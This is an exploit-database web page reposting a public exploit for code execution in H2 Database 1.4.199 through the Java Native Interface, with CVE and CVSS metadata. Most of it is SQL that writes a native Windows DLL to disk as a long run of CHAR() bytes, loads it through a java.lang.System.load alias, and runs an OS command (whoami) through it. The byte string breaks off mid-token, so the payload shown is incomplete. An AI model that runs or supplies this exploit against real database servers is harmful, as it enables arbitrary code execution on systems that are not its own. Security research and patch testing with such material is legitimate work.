Advertisement






H2 Database 1.4.199 JNI Code Execution

CVE Category Price Severity
CVE-2020-13939 CWE-264 Not specified High
Author Risk Exploitation Type Date
Bhavuk Jain Critical Local 2021-01-07
CPE
cpe:cpe:/a:h2database:h2_database:1.4.199
CVSS EPSS EPSSP
CVSS:4.0/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 0.0333801 0.55844

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021010054

Below is a copy:

H2 Database 1.4.199 JNI Code Execution
# Exploit Title: H2 Database 1.4.199 - JNI Code Execution
# Exploit Author: 1F98D
# Original Author: Markus Wulftange
# Date: 28 April 2020
# Vendor Hompage: https://www.h2database.com/
# Tested on: Windows 10 x64, Java 1.8, H2 1.4.199
# References: https://codewhitesec.blogspot.com/2019/08/exploit-h2-database-native-libraries-jni.html

# H2 allows users to gain code execution by compiling and running Java code
# however this requires the Java Compiler to be available on the machine running H2.
# This exploit utilises the Java Native Interface to load a a Java class without
# needing to use the Java Compiler

-- Write native library
SELECT CSVWRITE('C:\Windows\Temp\JNIScriptEngine.dll', CONCAT('SELECT NULL "', CHAR(0x4d),CHAR(0x5a),CHAR(0x90),CHAR(0x00),CHAR(0x03),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x04),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xff),CHAR(0xff),CHAR(0x00),CHAR(0x00),CHAR(0xb8),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x40),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x0e),CHAR(0x1f),CHAR(0xba),CHAR(0x0e),CHAR(0x00),CHAR(0xb4),CHAR(0x09),CHAR(0xcd),CHAR(0x21),CHAR(0xb8),CHAR(0x01),CHAR(0x4c),CHAR(0xcd),CHAR(0x21),CHAR(0x54),CHAR(0x68),CHAR(0x69),CHAR(0x73),CHAR(0x20),CHAR(0x70),CHAR(0x72),CHAR(0x6f),CHAR(0x67),CHAR(0x72),CHAR(0x61),CHAR(0x6d),CHAR(0x20),CHAR(0x63),CHAR(0x61),CHAR(0x6e),CHAR(0x6e),CHAR(0x6f),CHAR(0x74),CHAR(0x20),CHAR(0x62),CHAR(0x65),CHAR(0x20),CHAR(0x72),CHAR(0x75),CHAR(0x6e),CHAR(0x20),CHAR(0x69),CHAR(0x6e),CHAR(0x20),CHAR(0x44),CHAR(0x4f),CHAR(0x53),CHAR(0x20),CHAR(0x6d),CHAR(0x6f),CHAR(0x64),CHAR(0x65),CHAR(0x2e),CHAR(0x0d),CHAR(0x0d),CHAR(0x0a),CHAR(0x24),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x4e),CHAR(0xb0),CHAR(0xdb),CHAR(0x83),CHAR(0x0a),CHAR(0xd1),CHAR(0xb5),CHAR(0xd0),CHAR(0x0a),CHAR(0xd1),CHAR(0xb5),CHAR(0xd0),CHAR(0x0a),CHAR(0xd1),CHAR(0xb5),CHAR(0xd0),CHAR(0x03),CHAR(0xa9),CHAR(0x26),CHAR(0xd0),CHAR(0x08),CHAR(0xd1),CHAR(0xb5),CHAR(0xd0),CHAR(0x01),CHAR(0xbe),CHAR(0xb4),CHAR(0xd1),CHAR(0x08),CHAR(0xd1),CHAR(0xb5),CHAR(0xd0),CHAR(0x51),CHAR(0xb9),CHAR(0xb4),CHAR(0xd1),CHAR(0x09),CHAR(0xd1),CHAR(0xb5),CHAR(0xd0),CHAR(0x0a),CHAR(0xd1),CHAR(0xb4),CHAR(0xd0),CHAR(0x28),CHAR(0xd1),CHAR(0xb5),CHAR(0xd0),CHAR(0x01),CHAR(0xbe),CHAR(0xb0),CHAR(0xd1),CHAR(0x01),CHAR(0xd1),CHAR(0xb5),CHAR(0xd0),CHAR(0x01),CHAR(0xbe),CHAR(0xb1),CHAR(0xd1),CHAR(0x02),CHAR(0xd1),CHAR(0xb5),CHAR(0xd0),CHAR(0x01),CHAR(0xbe),CHAR(0xb6),CHAR(0xd1),CHAR(0x08),CHAR(0xd1),CHAR(0xb5),CHAR(0xd0),CHAR(0xc8),CHAR(0xbe),CHAR(0xb1),CHAR(0xd1),CHAR(0x0b),CHAR(0xd1),CHAR(0xb5),CHAR(0xd0),CHAR(0xc8),CHAR(0xbe),CHAR(0xb5),CHAR(0xd1),CHAR(0x0b),CHAR(0xd1),CHAR(0xb5),CHAR(0xd0),CHAR(0xc8),CHAR(0xbe),CHAR(0xb7),CHAR(0xd1),CHAR(0x0b),CHAR(0xd1),CHAR(0xb5),CHAR(0xd0),CHAR(0x52),CHAR(0x69),CHAR(0x63),CHAR(0x68),CHAR(0x0a),CHAR(0xd1),CHAR(0xb5),CHAR(0xd0),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x50),CHAR(0x45),CHAR(0x00),CHAR(0x00),CHAR(0x64),CHAR(0x86),CHAR(0x05),CHAR(0x00),CHAR(0x1c),CHAR(0xe7),CHAR(0xa7),CHAR(0x5e),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xf0),CHAR(0x00),CHAR(0x22),CHAR(0x22),CHAR(0x20),CHAR(0x0b),CHAR(0x02),CHAR(0x0e),CHAR(0x19),CHAR(0x00),CHAR(0x12),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x1c),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x04),CHAR(0x16),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x10),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x80),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x10),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x02),CHAR(0x00),CHAR(0x00),CHAR(0x06),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x06),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x70),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x04),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x02),CHAR(0x00),CHAR(0x60),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x10),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x10),CHAR(0x00),CHAR(0x00),C

-- Load native library
CREATE ALIAS IF NOT EXISTS System_load FOR "java.lang.System.load";
CALL System_load('C:\Windows\Temp\JNIScriptEngine.dll');

-- Evaluate script
CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval";
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("whoami").getInputStream()).useDelimiter("\\Z").next()');

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum